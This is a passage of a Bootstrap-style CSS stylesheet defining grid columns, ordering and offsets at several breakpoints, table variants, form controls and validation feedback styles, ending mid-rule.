.col-1, .col-2, .col-3, .col-4, .col-5, .col-6, .col-7, .col-8, .col-9, .col-10, .col-11, .col-12, .col,
.col-auto, .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm,
.col-sm-auto, .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12, .col-md,
.col-md-auto, .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg,
.col-lg-auto, .col-xl-1, .col-xl-2, .col-xl-3, .col-xl-4, .col-xl-5, .col-xl-6, .col-xl-7, .col-xl-8, .col-xl-9, .col-xl-10, .col-xl-11, .col-xl-12, .col-xl,
.col-xl-auto {
position: relative;
width: 100%;
padding-right: 7.5px;
padding-left: 7.5px;
}
.col {
-ms-flex-preferred-size: 0;
flex-basis: 0;
-ms-flex-positive: 1;
flex-grow: 1;
max-width: 100%;
}
.col-auto {
-ms-flex: 0 0 auto;
flex: 0 0 auto;
width: auto;
max-width: 100%;
}
.col-1 {
-ms-flex: 0 0 8.333333%;
flex: 0 0 8.333333%;
max-width: 8.333333%;
}
.col-2 {
-ms-flex: 0 0 16.666667%;
flex: 0 0 16.666667%;
max-width: 16.666667%;
}
.col-3 {
-ms-flex: 0 0 25%;
flex: 0 0 25%;
max-width: 25%;
}
.col-4 {
-ms-flex: 0 0 33.333333%;
flex: 0 0 33.333333%;
max-width: 33.333333%;
}
.col-5 {
-ms-flex: 0 0 41.666667%;
flex: 0 0 41.666667%;
max-width: 41.666667%;
}
.col-6 {
-ms-flex: 0 0 50%;
flex: 0 0 50%;
max-width: 50%;
}
.col-7 {
-ms-flex: 0 0 58.333333%;
flex: 0 0 58.333333%;
max-width: 58.333333%;
}
.col-8 {
-ms-flex: 0 0 66.666667%;
flex: 0 0 66.666667%;
max-width: 66.666667%;
}
.col-9 {
-ms-flex: 0 0 75%;
flex: 0 0 75%;
max-width: 75%;
}
.col-10 {
-ms-flex: 0 0 83.333333%;
flex: 0 0 83.333333%;
max-width: 83.333333%;
}
.col-11 {
-ms-flex: 0 0 91.666667%;
flex: 0 0 91.666667%;
max-width: 91.666667%;
}
.col-12 {
-ms-flex: 0 0 100%;
flex: 0 0 100%;
max-width: 100%;
}
.order-first {
-ms-flex-order: -1;
order: -1;
}
.order-last {
-ms-flex-order: 13;
order: 13;
}
.order-0 {
-ms-flex-order: 0;
order: 0;
}
.order-1 {
-ms-flex-order: 1;
order: 1;
}
.order-2 {
-ms-flex-order: 2;
order: 2;
}
.order-3 {
-ms-flex-order: 3;
order: 3;
}
.order-4 {
-ms-flex-order: 4;
order: 4;
}
.order-5 {
-ms-flex-order: 5;
order: 5;
}
.order-6 {
-ms-flex-order: 6;
order: 6;
}
.order-7 {
-ms-flex-order: 7;
order: 7;
}
.order-8 {
-ms-flex-order: 8;
order: 8;
}
.order-9 {
-ms-flex-order: 9;
order: 9;
}
.order-10 {
-ms-flex-order: 10;
order: 10;
}
.order-11 {
-ms-flex-order: 11;
order: 11;
}
.order-12 {
-ms-flex-order: 12;
order: 12;
}
.offset-1 {
margin-left: 8.333333%;
}
.offset-2 {
margin-left: 16.666667%;
}
.offset-3 {
margin-left: 25%;
}
.offset-4 {
margin-left: 33.333333%;
}
.offset-5 {
margin-left: 41.666667%;
}
.offset-6 {
margin-left: 50%;
}
.offset-7 {
margin-left: 58.333333%;
}
.offset-8 {
margin-left: 66.666667%;
}
.offset-9 {
margin-left: 75%;
}
.offset-10 {
margin-left: 83.333333%;
}
.offset-11 {
margin-left: 91.666667%;
}
@media (min-width: 576px) {
.col-sm {
-ms-flex-preferred-size: 0;
flex-basis: 0;
-ms-flex-positive: 1;
flex-grow: 1;
max-width: 100%;
}
.col-sm-auto {
-ms-flex: 0 0 auto;
flex: 0 0 auto;
width: auto;
max-width: 100%;
}
.col-sm-1 {
-ms-flex: 0 0 8.333333%;
flex: 0 0 8.333333%;
max-width: 8.333333%;
}
.col-sm-2 {
-ms-flex: 0 0 16.666667%;
flex: 0 0 16.666667%;
max-width: 16.666667%;
}
.col-sm-3 {
-ms-flex: 0 0 25%;
flex: 0 0 25%;
max-width: 25%;
}
.col-sm-4 {
-ms-flex: 0 0 33.333333%;
flex: 0 0 33.333333%;
max-width: 33.333333%;
}
.col-sm-5 {
-ms-flex: 0 0 41.666667%;
flex: 0 0 41.666667%;
max-width: 41.666667%;
}
.col-sm-6 {
-ms-flex: 0 0 50%;
flex: 0 0 50%;
max-width: 50%;
}
.col-sm-7 {
-ms-flex: 0 0 58.333333%;
flex: 0 0 58.333333%;
max-width: 58.333333%;
}
.col-sm-8 {
-ms-flex: 0 0 66.666667%;
flex: 0 0 66.666667%;
max-width: 66.666667%;
}
.col-sm-9 {
-ms-flex: 0 0 75%;
flex: 0 0 75%;
max-width: 75%;
}
.col-sm-10 {
-ms-flex: 0 0 83.333333%;
flex: 0 0 83.333333%;
max-width: 83.333333%;
}
.col-sm-11 {
-ms-flex: 0 0 91.666667%;
flex: 0 0 91.666667%;
max-width: 91.666667%;
}
.col-sm-12 {
-ms-flex: 0 0 100%;
flex: 0 0 100%;
max-width: 100%;
}
.order-sm-first {
-ms-flex-order: -1;
order: -1;
}
.order-sm-last {
-ms-flex-order: 13;
order: 13;
}
.order-sm-0 {
-ms-flex-order: 0;
order: 0;
}
.order-sm-1 {
-ms-flex-order: 1;
order: 1;
}
.order-sm-2 {
-ms-flex-order: 2;
order: 2;
}
.order-sm-3 {
-ms-flex-order: 3;
order: 3;
}
.order-sm-4 {
-ms-flex-order: 4;
order: 4;
}
.order-sm-5 {
-ms-flex-order: 5;
order: 5;
}
.order-sm-6 {
-ms-flex-order: 6;
order: 6;
}
.order-sm-7 {
-ms-flex-order: 7;
order: 7;
}
.order-sm-8 {
-ms-flex-order: 8;
order: 8;
}
.order-sm-9 {
-ms-flex-order: 9;
order: 9;
}
.order-sm-10 {
-ms-flex-order: 10;
order: 10;
}
.order-sm-11 {
-ms-flex-order: 11;
order: 11;
}
.order-sm-12 {
-ms-flex-order: 12;
order: 12;
}
.offset-sm-0 {
margin-left: 0;
}
.offset-sm-1 {
margin-left: 8.333333%;
}
.offset-sm-2 {
margin-left: 16.666667%;
}
.offset-sm-3 {
margin-left: 25%;
}
.offset-sm-4 {
margin-left: 33.333333%;
}
.offset-sm-5 {
margin-left: 41.666667%;
}
.offset-sm-6 {
margin-left: 50%;
}
.offset-sm-7 {
margin-left: 58.333333%;
}
.offset-sm-8 {
margin-left: 66.666667%;
}
.offset-sm-9 {
margin-left: 75%;
}
.offset-sm-10 {
margin-left: 83.333333%;
}
.offset-sm-11 {
margin-left: 91.666667%;
}
}
@media (min-width: 768px) {
.col-md {
-ms-flex-preferred-size: 0;
flex-basis: 0;
-ms-flex-positive: 1;
flex-grow: 1;
max-width: 100%;
}
.col-md-auto {
-ms-flex: 0 0 auto;
flex: 0 0 auto;
width: auto;
max-width: 100%;
}
.col-md-1 {
-ms-flex: 0 0 8.333333%;
flex: 0 0 8.333333%;
max-width: 8.333333%;
}
.col-md-2 {
-ms-flex: 0 0 16.666667%;
flex: 0 0 16.666667%;
max-width: 16.666667%;
}
.col-md-3 {
-ms-flex: 0 0 25%;
flex: 0 0 25%;
max-width: 25%;
}
.col-md-4 {
-ms-flex: 0 0 33.333333%;
flex: 0 0 33.333333%;
max-width: 33.333333%;
}
.col-md-5 {
-ms-flex: 0 0 41.666667%;
flex: 0 0 41.666667%;
max-width: 41.666667%;
}
.col-md-6 {
-ms-flex: 0 0 50%;
flex: 0 0 50%;
max-width: 50%;
}
.col-md-7 {
-ms-flex: 0 0 58.333333%;
flex: 0 0 58.333333%;
max-width: 58.333333%;
}
.col-md-8 {
-ms-flex: 0 0 66.666667%;
flex: 0 0 66.666667%;
max-width: 66.666667%;
}
.col-md-9 {
-ms-flex: 0 0 75%;
flex: 0 0 75%;
max-width: 75%;
}
.col-md-10 {
-ms-flex: 0 0 83.333333%;
flex: 0 0 83.333333%;
max-width: 83.333333%;
}
.col-md-11 {
-ms-flex: 0 0 91.666667%;
flex: 0 0 91.666667%;
max-width: 91.666667%;
}
.col-md-12 {
-ms-flex: 0 0 100%;
flex: 0 0 100%;
max-width: 100%;
}
.order-md-first {
-ms-flex-order: -1;
order: -1;
}
.order-md-last {
-ms-flex-order: 13;
order: 13;
}
.order-md-0 {
-ms-flex-order: 0;
order: 0;
}
.order-md-1 {
-ms-flex-order: 1;
order: 1;
}
.order-md-2 {
-ms-flex-order: 2;
order: 2;
}
.order-md-3 {
-ms-flex-order: 3;
order: 3;
}
.order-md-4 {
-ms-flex-order: 4;
order: 4;
}
.order-md-5 {
-ms-flex-order: 5;
order: 5;
}
.order-md-6 {
-ms-flex-order: 6;
order: 6;
}
.order-md-7 {
-ms-flex-order: 7;
order: 7;
}
.order-md-8 {
-ms-flex-order: 8;
order: 8;
}
.order-md-9 {
-ms-flex-order: 9;
order: 9;
}
.order-md-10 {
-ms-flex-order: 10;
order: 10;
}
.order-md-11 {
-ms-flex-order: 11;
order: 11;
}
.order-md-12 {
-ms-flex-order: 12;
order: 12;
}
.offset-md-0 {
margin-left: 0;
}
.offset-md-1 {
margin-left: 8.333333%;
}
.offset-md-2 {
margin-left: 16.666667%;
}
.offset-md-3 {
margin-left: 25%;
}
.offset-md-4 {
margin-left: 33.333333%;
}
.offset-md-5 {
margin-left: 41.666667%;
}
.offset-md-6 {
margin-left: 50%;
}
.offset-md-7 {
margin-left: 58.333333%;
}
.offset-md-8 {
margin-left: 66.666667%;
}
.offset-md-9 {
margin-left: 75%;
}
.offset-md-10 {
margin-left: 83.333333%;
}
.offset-md-11 {
margin-left: 91.666667%;
}
}
@media (min-width: 992px) {
.col-lg {
-ms-flex-preferred-size: 0;
flex-basis: 0;
-ms-flex-positive: 1;
flex-grow: 1;
max-width: 100%;
}
.col-lg-auto {
-ms-flex: 0 0 auto;
flex: 0 0 auto;
width: auto;
max-width: 100%;
}
.col-lg-1 {
-ms-flex: 0 0 8.333333%;
flex: 0 0 8.333333%;
max-width: 8.333333%;
}
.col-lg-2 {
-ms-flex: 0 0 16.666667%;
flex: 0 0 16.666667%;
max-width: 16.666667%;
}
.col-lg-3 {
-ms-flex: 0 0 25%;
flex: 0 0 25%;
max-width: 25%;
}
.col-lg-4 {
-ms-flex: 0 0 33.333333%;
flex: 0 0 33.333333%;
max-width: 33.333333%;
}
.col-lg-5 {
-ms-flex: 0 0 41.666667%;
flex: 0 0 41.666667%;
max-width: 41.666667%;
}
.col-lg-6 {
-ms-flex: 0 0 50%;
flex: 0 0 50%;
max-width: 50%;
}
.col-lg-7 {
-ms-flex: 0 0 58.333333%;
flex: 0 0 58.333333%;
max-width: 58.333333%;
}
.col-lg-8 {
-ms-flex: 0 0 66.666667%;
flex: 0 0 66.666667%;
max-width: 66.666667%;
}
.col-lg-9 {
-ms-flex: 0 0 75%;
flex: 0 0 75%;
max-width: 75%;
}
.col-lg-10 {
-ms-flex: 0 0 83.333333%;
flex: 0 0 83.333333%;
max-width: 83.333333%;
}
.col-lg-11 {
-ms-flex: 0 0 91.666667%;
flex: 0 0 91.666667%;
max-width: 91.666667%;
}
.col-lg-12 {
-ms-flex: 0 0 100%;
flex: 0 0 100%;
max-width: 100%;
}
.order-lg-first {
-ms-flex-order: -1;
order: -1;
}
.order-lg-last {
-ms-flex-order: 13;
order: 13;
}
.order-lg-0 {
-ms-flex-order: 0;
order: 0;
}
.order-lg-1 {
-ms-flex-order: 1;
order: 1;
}
.order-lg-2 {
-ms-flex-order: 2;
order: 2;
}
.order-lg-3 {
-ms-flex-order: 3;
order: 3;
}
.order-lg-4 {
-ms-flex-order: 4;
order: 4;
}
.order-lg-5 {
-ms-flex-order: 5;
order: 5;
}
.order-lg-6 {
-ms-flex-order: 6;
order: 6;
}
.order-lg-7 {
-ms-flex-order: 7;
order: 7;
}
.order-lg-8 {
-ms-flex-order: 8;
order: 8;
}
.order-lg-9 {
-ms-flex-order: 9;
order: 9;
}
.order-lg-10 {
-ms-flex-order: 10;
order: 10;
}
.order-lg-11 {
-ms-flex-order: 11;
order: 11;
}
.order-lg-12 {
-ms-flex-order: 12;
order: 12;
}
.offset-lg-0 {
margin-left: 0;
}
.offset-lg-1 {
margin-left: 8.333333%;
}
.offset-lg-2 {
margin-left: 16.666667%;
}
.offset-lg-3 {
margin-left: 25%;
}
.offset-lg-4 {
margin-left: 33.333333%;
}
.offset-lg-5 {
margin-left: 41.666667%;
}
.offset-lg-6 {
margin-left: 50%;
}
.offset-lg-7 {
margin-left: 58.333333%;
}
.offset-lg-8 {
margin-left: 66.666667%;
}
.offset-lg-9 {
margin-left: 75%;
}
.offset-lg-10 {
margin-left: 83.333333%;
}
.offset-lg-11 {
margin-left: 91.666667%;
}
}
@media (min-width: 1200px) {
.col-xl {
-ms-flex-preferred-size: 0;
flex-basis: 0;
-ms-flex-positive: 1;
flex-grow: 1;
max-width: 100%;
}
.col-xl-auto {
-ms-flex: 0 0 auto;
flex: 0 0 auto;
width: auto;
max-width: 100%;
}
.col-xl-1 {
-ms-flex: 0 0 8.333333%;
flex: 0 0 8.333333%;
max-width: 8.333333%;
}
.col-xl-2 {
-ms-flex: 0 0 16.666667%;
flex: 0 0 16.666667%;
max-width: 16.666667%;
}
.col-xl-3 {
-ms-flex: 0 0 25%;
flex: 0 0 25%;
max-width: 25%;
}
.col-xl-4 {
-ms-flex: 0 0 33.333333%;
flex: 0 0 33.333333%;
max-width: 33.333333%;
}
.col-xl-5 {
-ms-flex: 0 0 41.666667%;
flex: 0 0 41.666667%;
max-width: 41.666667%;
}
.col-xl-6 {
-ms-flex: 0 0 50%;
flex: 0 0 50%;
max-width: 50%;
}
.col-xl-7 {
-ms-flex: 0 0 58.333333%;
flex: 0 0 58.333333%;
max-width: 58.333333%;
}
.col-xl-8 {
-ms-flex: 0 0 66.666667%;
flex: 0 0 66.666667%;
max-width: 66.666667%;
}
.col-xl-9 {
-ms-flex: 0 0 75%;
flex: 0 0 75%;
max-width: 75%;
}
.col-xl-10 {
-ms-flex: 0 0 83.333333%;
flex: 0 0 83.333333%;
max-width: 83.333333%;
}
.col-xl-11 {
-ms-flex: 0 0 91.666667%;
flex: 0 0 91.666667%;
max-width: 91.666667%;
}
.col-xl-12 {
-ms-flex: 0 0 100%;
flex: 0 0 100%;
max-width: 100%;
}
.order-xl-first {
-ms-flex-order: -1;
order: -1;
}
.order-xl-last {
-ms-flex-order: 13;
order: 13;
}
.order-xl-0 {
-ms-flex-order: 0;
order: 0;
}
.order-xl-1 {
-ms-flex-order: 1;
order: 1;
}
.order-xl-2 {
-ms-flex-order: 2;
order: 2;
}
.order-xl-3 {
-ms-flex-order: 3;
order: 3;
}
.order-xl-4 {
-ms-flex-order: 4;
order: 4;
}
.order-xl-5 {
-ms-flex-order: 5;
order: 5;
}
.order-xl-6 {
-ms-flex-order: 6;
order: 6;
}
.order-xl-7 {
-ms-flex-order: 7;
order: 7;
}
.order-xl-8 {
-ms-flex-order: 8;
order: 8;
}
.order-xl-9 {
-ms-flex-order: 9;
order: 9;
}
.order-xl-10 {
-ms-flex-order: 10;
order: 10;
}
.order-xl-11 {
-ms-flex-order: 11;
order: 11;
}
.order-xl-12 {
-ms-flex-order: 12;
order: 12;
}
.offset-xl-0 {
margin-left: 0;
}
.offset-xl-1 {
margin-left: 8.333333%;
}
.offset-xl-2 {
margin-left: 16.666667%;
}
.offset-xl-3 {
margin-left: 25%;
}
.offset-xl-4 {
margin-left: 33.333333%;
}
.offset-xl-5 {
margin-left: 41.666667%;
}
.offset-xl-6 {
margin-left: 50%;
}
.offset-xl-7 {
margin-left: 58.333333%;
}
.offset-xl-8 {
margin-left: 66.666667%;
}
.offset-xl-9 {
margin-left: 75%;
}
.offset-xl-10 {
margin-left: 83.333333%;
}
.offset-xl-11 {
margin-left: 91.666667%;
}
}
.table {
width: 100%;
margin-bottom: 1rem;
color: #212529;
background-color: transparent;
}
.table th,
.table td {
padding: 0.75rem;
vertical-align: top;
border-top: 1px solid #dee2e6;
}
.table thead th {
vertical-align: bottom;
border-bottom: 2px solid #dee2e6;
}
.table tbody + tbody {
border-top: 2px solid #dee2e6;
}
.table-sm th,
.table-sm td {
padding: 0.3rem;
}
.table-bordered {
border: 1px solid #dee2e6;
}
.table-bordered th,
.table-bordered td {
border: 1px solid #dee2e6;
}
.table-bordered thead th,
.table-bordered thead td {
border-bottom-width: 2px;
}
.table-borderless th,
.table-borderless td,
.table-borderless thead th,
.table-borderless tbody + tbody {
border: 0;
}
.table-striped tbody tr:nth-of-type(odd) {
background-color: rgba(0, 0, 0, 0.05);
}
.table-hover tbody tr:hover {
color: #212529;
background-color: rgba(0, 0, 0, 0.075);
}
.table-primary,
.table-primary > th,
.table-primary > td {
background-color: #b8daff;
}
.table-primary th,
.table-primary td,
.table-primary thead th,
.table-primary tbody + tbody {
border-color: #7abaff;
}
.table-hover .table-primary:hover {
background-color: #9fcdff;
}
.table-hover .table-primary:hover > td,
.table-hover .table-primary:hover > th {
background-color: #9fcdff;
}
.table-secondary,
.table-secondary > th,
.table-secondary > td {
background-color: #d6d8db;
}
.table-secondary th,
.table-secondary td,
.table-secondary thead th,
.table-secondary tbody + tbody {
border-color: #b3b7bb;
}
.table-hover .table-secondary:hover {
background-color: #c8cbcf;
}
.table-hover .table-secondary:hover > td,
.table-hover .table-secondary:hover > th {
background-color: #c8cbcf;
}
.table-success,
.table-success > th,
.table-success > td {
background-color: #c3e6cb;
}
.table-success th,
.table-success td,
.table-success thead th,
.table-success tbody + tbody {
border-color: #8fd19e;
}
.table-hover .table-success:hover {
background-color: #b1dfbb;
}
.table-hover .table-success:hover > td,
.table-hover .table-success:hover > th {
background-color: #b1dfbb;
}
.table-info,
.table-info > th,
.table-info > td {
background-color: #bee5eb;
}
.table-info th,
.table-info td,
.table-info thead th,
.table-info tbody + tbody {
border-color: #86cfda;
}
.table-hover .table-info:hover {
background-color: #abdde5;
}
.table-hover .table-info:hover > td,
.table-hover .table-info:hover > th {
background-color: #abdde5;
}
.table-warning,
.table-warning > th,
.table-warning > td {
background-color: #ffeeba;
}
.table-warning th,
.table-warning td,
.table-warning thead th,
.table-warning tbody + tbody {
border-color: #ffdf7e;
}
.table-hover .table-warning:hover {
background-color: #ffe8a1;
}
.table-hover .table-warning:hover > td,
.table-hover .table-warning:hover > th {
background-color: #ffe8a1;
}
.table-danger,
.table-danger > th,
.table-danger > td {
background-color: #f5c6cb;
}
.table-danger th,
.table-danger td,
.table-danger thead th,
.table-danger tbody + tbody {
border-color: #ed969e;
}
.table-hover .table-danger:hover {
background-color: #f1b0b7;
}
.table-hover .table-danger:hover > td,
.table-hover .table-danger:hover > th {
background-color: #f1b0b7;
}
.table-light,
.table-light > th,
.table-light > td {
background-color: #fdfdfe;
}
.table-light th,
.table-light td,
.table-light thead th,
.table-light tbody + tbody {
border-color: #fbfcfc;
}
.table-hover .table-light:hover {
background-color: #ececf6;
}
.table-hover .table-light:hover > td,
.table-hover .table-light:hover > th {
background-color: #ececf6;
}
.table-dark,
.table-dark > th,
.table-dark > td {
background-color: #c6c8ca;
}
.table-dark th,
.table-dark td,
.table-dark thead th,
.table-dark tbody + tbody {
border-color: #95999c;
}
.table-hover .table-dark:hover {
background-color: #b9bbbe;
}
.table-hover .table-dark:hover > td,
.table-hover .table-dark:hover > th {
background-color: #b9bbbe;
}
.table-active,
.table-active > th,
.table-active > td {
background-color: rgba(0, 0, 0, 0.075);
}
.table-hover .table-active:hover {
background-color: rgba(0, 0, 0, 0.075);
}
.table-hover .table-active:hover > td,
.table-hover .table-active:hover > th {
background-color: rgba(0, 0, 0, 0.075);
}
.table .thead-dark th {
color: #ffffff;
background-color: #212529;
border-color: #383f45;
}
.table .thead-light th {
color: #495057;
background-color: #e9ecef;
border-color: #dee2e6;
}
.table-dark {
color: #ffffff;
background-color: #212529;
}
.table-dark th,
.table-dark td,
.table-dark thead th {
border-color: #383f45;
}
.table-dark.table-bordered {
border: 0;
}
.table-dark.table-striped tbody tr:nth-of-type(odd) {
background-color: rgba(255, 255, 255, 0.05);
}
.table-dark.table-hover tbody tr:hover {
color: #ffffff;
background-color: rgba(255, 255, 255, 0.075);
}
@media (max-width: 575.98px) {
.table-responsive-sm {
display: block;
width: 100%;
overflow-x: auto;
-webkit-overflow-scrolling: touch;
}
.table-responsive-sm > .table-bordered {
border: 0;
}
}
@media (max-width: 767.98px) {
.table-responsive-md {
display: block;
width: 100%;
overflow-x: auto;
-webkit-overflow-scrolling: touch;
}
.table-responsive-md > .table-bordered {
border: 0;
}
}
@media (max-width: 991.98px) {
.table-responsive-lg {
display: block;
width: 100%;
overflow-x: auto;
-webkit-overflow-scrolling: touch;
}
.table-responsive-lg > .table-bordered {
border: 0;
}
}
@media (max-width: 1199.98px) {
.table-responsive-xl {
display: block;
width: 100%;
overflow-x: auto;
-webkit-overflow-scrolling: touch;
}
.table-responsive-xl > .table-bordered {
border: 0;
}
}
.table-responsive {
display: block;
width: 100%;
overflow-x: auto;
-webkit-overflow-scrolling: touch;
}
.table-responsive > .table-bordered {
border: 0;
}
.form-control {
display: block;
width: 100%;
height: calc(2.25rem + 2px);
padding: 0.375rem 0.75rem;
font-size: 1rem;
font-weight: 400;
line-height: 1.5;
color: #495057;
background-color: #ffffff;
background-clip: padding-box;
border: 1px solid #ced4da;
border-radius: 0.25rem;
box-shadow: inset 0 0 0 rgba(0, 0, 0, 0);
transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
.form-control {
transition: none;
}
}
.form-control::-ms-expand {
background-color: transparent;
border: 0;
}
.form-control:focus {
color: #495057;
background-color: #ffffff;
border-color: #80bdff;
outline: 0;
box-shadow: inset 0 0 0 rgba(0, 0, 0, 0), none;
}
.form-control::-webkit-input-placeholder {
color: #939ba2;
opacity: 1;
}
.form-control::-moz-placeholder {
color: #939ba2;
opacity: 1;
}
.form-control:-ms-input-placeholder {
color: #939ba2;
opacity: 1;
}
.form-control::-ms-input-placeholder {
color: #939ba2;
opacity: 1;
}
.form-control::placeholder {
color: #939ba2;
opacity: 1;
}
.form-control:disabled, .form-control[readonly] {
background-color: #e9ecef;
opacity: 1;
}
select.form-control:focus::-ms-value {
color: #495057;
background-color: #ffffff;
}
.form-control-file,
.form-control-range {
display: block;
width: 100%;
}
.col-form-label {
padding-top: calc(0.375rem + 1px);
padding-bottom: calc(0.375rem + 1px);
margin-bottom: 0;
font-size: inherit;
line-height: 1.5;
}
.col-form-label-lg {
padding-top: calc(0.5rem + 1px);
padding-bottom: calc(0.5rem + 1px);
font-size: 1.25rem;
line-height: 1.5;
}
.col-form-label-sm {
padding-top: calc(0.25rem + 1px);
padding-bottom: calc(0.25rem + 1px);
font-size: 0.875rem;
line-height: 1.5;
}
.form-control-plaintext {
display: block;
width: 100%;
padding-top: 0.375rem;
padding-bottom: 0.375rem;
margin-bottom: 0;
line-height: 1.5;
color: #212529;
background-color: transparent;
border: solid transparent;
border-width: 1px 0;
}
.form-control-plaintext.form-control-sm, .form-control-plaintext.form-control-lg {
padding-right: 0;
padding-left: 0;
}
.form-control-sm {
height: calc(1.8125rem + 2px);
padding: 0.25rem 0.5rem;
font-size: 0.875rem;
line-height: 1.5;
border-radius: 0.2rem;
}
.form-control-lg {
height: calc(2.875rem + 2px);
padding: 0.5rem 1rem;
font-size: 1.25rem;
line-height: 1.5;
border-radius: 0.3rem;
}
select.form-control[size], select.form-control[multiple] {
height: auto;
}
textarea.form-control {
height: auto;
}
.form-group {
margin-bottom: 1rem;
}
.form-text {
display: block;
margin-top: 0.25rem;
}
.form-row {
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
margin-right: -5px;
margin-left: -5px;
}
.form-row > .col,
.form-row > [class*="col-"] {
padding-right: 5px;
padding-left: 5px;
}
.form-check {
position: relative;
display: block;
padding-left: 1.25rem;
}
.form-check-input {
position: absolute;
margin-top: 0.3rem;
margin-left: -1.25rem;
}
.form-check-input:disabled ~ .form-check-label {
color: #6c757d;
}
.form-check-label {
margin-bottom: 0;
}
.form-check-inline {
display: -ms-inline-flexbox;
display: inline-flex;
-ms-flex-align: center;
align-items: center;
padding-left: 0;
margin-right: 0.75rem;
}
.form-check-inline .form-check-input {
position: static;
margin-top: 0;
margin-right: 0.3125rem;
margin-left: 0;
}
.valid-feedback {
display: none;
width: 100%;
margin-top: 0.25rem;
font-size: 80%;
color: #28a745;
}
.valid-tooltip {
position: absolute;
top: 100%;
z-index: 5;
display: none;
max-width: 100%;
padding: 0.25rem 0.5rem;
margin-top: .1rem;
font-size: 0.875rem;
line-height: 1.5;
color: #ffffff;
background-color: rgba(40, 167, 69, 0.9);
border-radius: 0.25rem;
}
.was-validated .form-control:valid, .form-control.is-valid {
border-color: #28a745;
padding-right: 2.25rem;
background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");
background-repeat: no-repeat;
background-position: center right calc(0.375em + 0.1875rem);
background-size: calc(0.75em + 0.375rem) calc(0.75em + 0.375rem);
}
.was-validated .form-control:valid:focus, .form-control.is-valid:focus {
border-color: #28a745;
box-shadow: 0 0 0 0 rgba(40, 167, 69, 0.25);
}
.was-validated .form-control:valid ~ .valid-feedback,
.was-validated .form-control:valid ~ .valid-tooltip, .form-control.is-valid ~ .valid-feedback,
.form-control.is-valid ~ .valid-tooltip {
display: block;
}
.was-validated textarea.form-control:valid, textarea.form-control.is-valid {
padding-right: 2.25rem;
background-position: top calc(0.375em + 0.1875rem) right calc(0.375em + 0.1875rem);
}
.was-validated .custom-select:valid, .custom-select.is-valid {
border-color: #28a745;
padding-right: calc((1em + 0.75rem) * 3 / 4 + 1.75rem);
background: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3E%3Cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3E%3C/svg%3E") no-repeat right 0.75rem center/8px 10px, url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e") #ffffff no-repeat center right 1.75rem/calc(0.75em + 0.375rem) calc(0.75em + 0.375rem);
}
.was-validated .custom-select:valid:focus, .custom-select.is-valid:focus {
border-color: #28a745;
box-shadow: 0 0 0 0 rgba(40, 167, 69, 0.25);
}
.was-validated .custom-select:valid ~ .valid-feedback,
.was-validated .custom-select:valid ~ .valid-tooltip, .custom-select.is-valid ~ .valid-feedback,
.custom-select.is-valid ~ .valid-tooltip {
display: block;
}
.was-validated .form-control-file:valid ~ .valid-feedback,
.was-validated .form-control-file:valid ~ .valid-tooltip, .form-control-file.is-valid ~ .valid-feedback,
.form-control-file.is-valid ~ .valid-tooltip {
display: block;
}
.was-validated .form-check-input:valid ~ .form-check-label, .form-check-input.is-valid ~ .form-check-label {
color: #28a745;
}
.was-validated .form-check-input:valid ~ .valid-feedback,
.was-validated .form-check-input:valid ~ .valid-tooltip, .form-check-input.is-valid ~ .valid-feedback,
.form-check-input.is-valid ~ .valid-tooltip {
display: block;
}
.was-validated .custom-control-input:valid ~ .custom-control-label, .custom-control-input.is-valid ~ .custom-control-label {
color: #28a745;
}
.was-validated .custom-control-input:valid ~ .custom-control-label::before, .custom-control-input.is-valid ~ .custom-control-label::before {
border-color: #28a745;
}
.was-validated .custom-control-input:valid ~ .valid-feedback,
.was-validated .custom-control-input:valid ~ .valid-tooltip, .custom-control-input.is-valid ~ .valid-feedback,
.custom-control-input.is-valid ~ .valid-tooltip {
display: block;
}
.was-validated .custom-control-input:valid:checked ~ .custom-control-label::before, .custom-control-input.is-valid:checked ~ .custom-control-label::before {
border-color: #34ce57;
background-color: #34ce57;
}
.was-validated .custom-control-input:valid:focus ~ .custom-control-label::before, .custom-control-input.is-valid:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 0 rgba(40, 167, 69, 0.25);
}
.was-validated .custom-control-input:valid:focus:not(:checked) ~ .custom-control-label::before, .custom-control-input.is-valid:focus:not(:checked) ~ .custom-control-label::before {
border-color: #28a745;
}
.was-validated .custom-file-input:valid ~ .custom-file-label, .custom-file-input.is-valid ~ .custom-file-label {
border-color: #28a745;
}
.was-validated .custom-file-input:valid ~ .valid-feedback,
.was-validated .custom-file-input:valid ~ .valid-tooltip, .custom-file-input.is-valid ~ .valid-feedback,
.custom-file-input.is-valid ~ .valid-tooltip {
display: block;
}
.was-validated .custom-file-input:valid:focus ~ .custom-file-label, .custom-file-input.is-valid:focus ~ .custom-file-label {
border-color: #28a745;
box-shadow: 0 0 0 0 rgba(40, 167, 69, 0.25);
}
.invalid-feedback {
display: none;
width: 100%;
margin-top: 0.25rem;
font-size: 80%;
color: #dc3545;
}
.invalid-tooltip {
position: absolute;
top: 100%;
z-index: 5;
display: none;
max-width: 100%;
padding: 0.25rem 0.5rem;
